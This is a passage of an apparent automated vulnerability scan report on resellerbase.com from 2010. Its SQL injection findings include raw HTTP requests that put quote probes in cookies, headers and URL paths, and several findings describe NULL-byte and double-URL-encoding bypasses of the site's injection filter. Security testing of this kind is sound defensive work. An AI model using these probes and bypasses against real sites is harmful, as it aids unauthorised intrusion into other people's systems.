9. Robots.txt file

10. HTML does not specify charset

10.1. http://www.resellerbase.com/add.php/

10.2. http://www.resellerbase.com/adult/media-chat/more2.html

10.3. http://www.resellerbase.com/adult/more2.html

10.4. http://www.resellerbase.com/blocks/

10.5. http://www.resellerbase.com/cgi-bin/

10.6. http://www.resellerbase.com/goods-wholesale/search.php

10.7. http://www.resellerbase.com/other/search.php

10.8. http://www.resellerbase.com/resources-information/ebooks/search.php

10.9. http://www.resellerbase.com/resources-information/search.php

10.10. http://www.resellerbase.com/tag/Outsource+SEO

10.11. http://www.resellerbase.com/tag/Reseller+SEO

10.12. http://www.resellerbase.com/tag/Resellers+SEO

10.13. http://www.resellerbase.com/tag/SEO+Reseller

10.14. http://www.resellerbase.com/tag/SEO+Resellers

10.15. http://www.resellerbase.com/tag/SEO+outsourcing

10.16. http://www.resellerbase.com/tag/SEO+reseller+program

10.17. http://www.resellerbase.com/tag/White+Label+SEO

10.18. http://www.resellerbase.com/tag/downtime+monitor

10.19. http://www.resellerbase.com/tag/dripship

10.20. http://www.resellerbase.com/tag/dropshipping

10.21. http://www.resellerbase.com/tag/email+fax

10.22. http://www.resellerbase.com/tag/nude

10.23. http://www.resellerbase.com/tag/outsource

10.24. http://www.resellerbase.com/tag/reseller

10.25. http://www.resellerbase.com/tag/search+engine+optimisation

10.26. http://www.resellerbase.com/tag/search+engine+optimization

10.27. http://www.resellerbase.com/tag/search+engine+submission

10.28. http://www.resellerbase.com/tag/seo

10.29. http://www.resellerbase.com/tag/ssl+certificates

10.30. http://www.resellerbase.com/tag/survey

10.31. http://www.resellerbase.com/tag/uptime+monitoring

10.32. http://www.resellerbase.com/tag/web+cam+chat

10.33. http://www.resellerbase.com/tag/web+statistics

10.34. http://www.resellerbase.com/tag/webhosting

10.35. http://www.resellerbase.com/tag/website+monitoring

10.36. http://www.resellerbase.com/themes/

10.37. http://www.resellerbase.com/themes/kosmos/

10.38. http://www.resellerbase.com/themes/kosmos/images/

10.39. http://www.resellerbase.com/themes/kosmos/images/pr/

10.40. http://www.resellerbase.com/themes/kosmos/images/rating/

10.41. http://www.resellerbase.com/themes/kosmos/images/review/

10.42. http://www.resellerbase.com/themes/kosmos/images/template_24.gif/

10.43. http://www.resellerbase.com/user_detail.php

10.44. http://www.resellerbase.com/web-service/more2.html

11. Content type incorrectly stated

11.1. http://www.resellerbase.com/adult/media-chat/more2.html

11.2. http://www.resellerbase.com/adult/more2.html

11.3. http://www.resellerbase.com/goods-wholesale/search.php

11.4. http://www.resellerbase.com/googlepr.php

11.5. http://www.resellerbase.com/other/search.php

11.6. http://www.resellerbase.com/resources-information/ebooks/search.php

11.7. http://www.resellerbase.com/resources-information/search.php

11.8. http://www.resellerbase.com/tag/Outsource+SEO

11.9. http://www.resellerbase.com/tag/Reseller+SEO

11.10. http://www.resellerbase.com/tag/Resellers+SEO

11.11. http://www.resellerbase.com/tag/SEO+Reseller

11.12. http://www.resellerbase.com/tag/SEO+Resellers

11.13. http://www.resellerbase.com/tag/SEO+outsourcing

11.14. http://www.resellerbase.com/tag/SEO+reseller+program

11.15. http://www.resellerbase.com/tag/White+Label+SEO

11.16. http://www.resellerbase.com/tag/downtime+monitor

11.17. http://www.resellerbase.com/tag/dripship

11.18. http://www.resellerbase.com/tag/dropshipping

11.19. http://www.resellerbase.com/tag/email+fax

11.20. http://www.resellerbase.com/tag/nude

11.21. http://www.resellerbase.com/tag/outsource

11.22. http://www.resellerbase.com/tag/reseller

11.23. http://www.resellerbase.com/tag/search+engine+optimisation

11.24. http://www.resellerbase.com/tag/search+engine+optimization

11.25. http://www.resellerbase.com/tag/search+engine+submission

11.26. http://www.resellerbase.com/tag/seo

11.27. http://www.resellerbase.com/tag/ssl+certificates

11.28. http://www.resellerbase.com/tag/survey

11.29. http://www.resellerbase.com/tag/uptime+monitoring

11.30. http://www.resellerbase.com/tag/web+cam+chat

11.31. http://www.resellerbase.com/tag/web+statistics

11.32. http://www.resellerbase.com/tag/webhosting

11.33. http://www.resellerbase.com/tag/website+monitoring

11.34. http://www.resellerbase.com/web-service/more2.html



1. SQL injection
There are 23 instances of this issue:

Issue background

SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.

Issue remediation

The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already been defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and to avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.

You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:



1.1. http://www.resellerbase.com/admin/ [COOKIE_SORT_BY cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.resellerbase.com
Path:   /admin/

Issue detail

The COOKIE_SORT_BY cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the COOKIE_SORT_BY cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /admin/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title'; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response 1

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 01:17:52 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Content-Length: 636
Connection: close
Content-Type: text/html

<br />
<b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: Too many connections in <b>/home/resellerbase/domains/resellerbase.com/public_html/lib/db.class.p
...[SNIP]...
<b>Fatal error</b>
...[SNIP]...

Request 2

GET /admin/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title''; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response 2

HTTP/1.1 302 Found
Date: Thu, 18 Nov 2010 01:17:53 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Location: http://www.resellerbase.com/login.php?f=1&b=%2Fadmin%2F
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Connection: close
Content-Type: text/html


1.2. http://www.resellerbase.com/sendmail.php/ [Referer HTTP header]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.resellerbase.com
Path:   /sendmail.php/

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /sendmail.php/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;
Referer: http://www.google.com/search?hl=en&q=%00'

Response 1

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 01:17:54 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Content-Length: 636
Connection: close
Content-Type: text/html

<br />
<b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: Too many connections in <b>/home/resellerbase/domains/resellerbase.com/public_html/lib/db.class.p
...[SNIP]...
<b>Fatal error</b>
...[SNIP]...

Request 2

GET /sendmail.php/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;
Referer: http://www.google.com/search?hl=en&q=%00''

Response 2

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 01:17:54 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9618

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Send Email</title>
<
...[SNIP]...

1.3. http://www.resellerbase.com/tag/adult [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.resellerbase.com
Path:   /tag/adult

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /tag'/adult HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/37/neondollars-com.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response 1

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:58:07 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Content-Length: 185
Connection: close
Content-Type: text/html

<br />
<b>Fatal error</b>: Call to a member function Fields() on a non-object in <b>/home/resellerbase/domains/resellerbase.com/public_html/lib/db.class.php</b> on line <b>0</b><br />

Request 2

GET /tag''/adult HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/37/neondollars-com.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response 2

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:58:07 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 55824

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by categories
...[SNIP]...

1.4. http://www.resellerbase.com/tag/tag/adult/more2.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.resellerbase.com
Path:   /tag/tag/adult/more2.html

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /tag'/tag/adult/more2.html HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response 1

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:55:50 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Content-Length: 185
Connection: close
Content-Type: text/html

<br />
<b>Fatal error</b>: Call to a member function Fields() on a non-object in <b>/home/resellerbase/domains/resellerbase.com/public_html/lib/db.class.php</b> on line <b>0</b><br />

Request 2

GET /tag''/tag/adult/more2.html HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response 2

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:55:51 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 43944

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by categories
...[SNIP]...

1.5. http://www.resellerbase.com/tag/travel [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.resellerbase.com
Path:   /tag/travel

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /tag'/travel HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/20/ian-com.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response 1

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:56:08 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Content-Length: 185
Connection: close
Content-Type: text/html

<br />
<b>Fatal error</b>: Call to a member function Fields() on a non-object in <b>/home/resellerbase/domains/resellerbase.com/public_html/lib/db.class.php</b> on line <b>0</b><br />

Request 2

GET /tag''/travel HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/20/ian-com.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response 2

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:56:08 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 20530

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by categories
...[SNIP]...

1.6. http://www.resellerbase.com/user_detail.php [COOKIE_SORT_BY cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.resellerbase.com
Path:   /user_detail.php

Issue detail

The COOKIE_SORT_BY cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the COOKIE_SORT_BY cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /user_detail.php?u=rachelew HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title'; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response 1

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 01:12:49 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Content-Length: 636
Connection: close
Content-Type: text/html

<br />
<b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: Too many connections in <b>/home/resellerbase/domains/resellerbase.com/public_html/lib/db.class.p
...[SNIP]...
<b>Fatal error</b>
...[SNIP]...

Request 2

GET /user_detail.php?u=rachelew HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title''; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response 2

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 01:12:49 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 10024

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>User Detail</title>

...[SNIP]...

1.7. http://www.resellerbase.com/user_detail.php [COOKIE_SORT_BY cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.resellerbase.com
Path:   /user_detail.php

Issue detail

The COOKIE_SORT_BY cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the COOKIE_SORT_BY cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the COOKIE_SORT_BY cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /user_detail.php?u=rubikasuss HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title%2527; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response 1

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 01:13:13 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Content-Length: 636
Connection: close
Content-Type: text/html

<br />
<b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: Too many connections in <b>/home/resellerbase/domains/resellerbase.com/public_html/lib/db.class.p
...[SNIP]...
<b>Fatal error</b>
...[SNIP]...

Request 2

GET /user_detail.php?u=rubikasuss HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title%2527%2527; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response 2

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 01:13:13 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 10030

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>User Detail</title>

...[SNIP]...

1.8. http://www.resellerbase.com/user_detail.php [COOKIE_SORT_BY cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.resellerbase.com
Path:   /user_detail.php

Issue detail

The COOKIE_SORT_BY cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the COOKIE_SORT_BY cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /user_detail.php?u=weskemots HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title%00'; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response 1

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 01:16:29 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Content-Length: 636
Connection: close
Content-Type: text/html

<br />
<b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: Too many connections in <b>/home/resellerbase/domains/resellerbase.com/public_html/lib/db.class.p
...[SNIP]...
<b>Fatal error</b>
...[SNIP]...

Request 2

GET /user_detail.php?u=weskemots HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title%00''; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response 2

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 01:16:29 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 10027

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>User Detail</title>

...[SNIP]...

1.9. http://www.resellerbase.com/user_detail.php [COOKIE_SORT_ORDER cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.resellerbase.com
Path:   /user_detail.php

Issue detail

The COOKIE_SORT_ORDER cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the COOKIE_SORT_ORDER cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /user_detail.php?u=roomma HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc'; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response 1

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 01:12:53 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Content-Length: 636
Connection: close
Content-Type: text/html

<br />
<b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: Too many connections in <b>/home/resellerbase/domains/resellerbase.com/public_html/lib/db.class.p
...[SNIP]...
<b>Fatal error</b>
...[SNIP]...

Request 2

GET /user_detail.php?u=roomma HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc''; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response 2

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 01:12:53 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 10018

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>User Detail</title>

...[SNIP]...

1.10. http://www.resellerbase.com/user_detail.php [COOKIE_SORT_ORDER cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.resellerbase.com
Path:   /user_detail.php

Issue detail

The COOKIE_SORT_ORDER cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the COOKIE_SORT_ORDER cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the COOKIE_SORT_ORDER cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /user_detail.php?u=mason33jewell HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc%2527; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response 1

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 01:10:48 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Content-Length: 636
Connection: close
Content-Type: text/html

<br />
<b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: Too many connections in <b>/home/resellerbase/domains/resellerbase.com/public_html/lib/db.class.p
...[SNIP]...
<b>Fatal error</b>
...[SNIP]...

Request 2

GET /user_detail.php?u=mason33jewell HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc%2527%2527; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response 2

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 01:10:48 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 10039

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>User Detail</title>

...[SNIP]...

1.11. http://www.resellerbase.com/user_detail.php [COOKIE_SORT_ORDER cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.resellerbase.com
Path:   /user_detail.php

Issue detail

The COOKIE_SORT_ORDER cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the COOKIE_SORT_ORDER cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /user_detail.php?u=skobak HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc%00'; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response 1

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 01:15:10 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Content-Length: 636
Connection: close
Content-Type: text/html

<br />
<b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: Too many connections in <b>/home/resellerbase/domains/resellerbase.com/public_html/lib/db.class.p
...[SNIP]...
<b>Fatal error</b>
...[SNIP]...

Request 2

GET /user_detail.php?u=skobak HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc%00''; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response 2

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 01:15:10 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 10018

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>User Detail</title>

...[SNIP]...

1.12. http://www.resellerbase.com/user_detail.php [COOKIE_SORT_ORDER cookie]

Summary

Severity:   High
Confidence:   Tentative
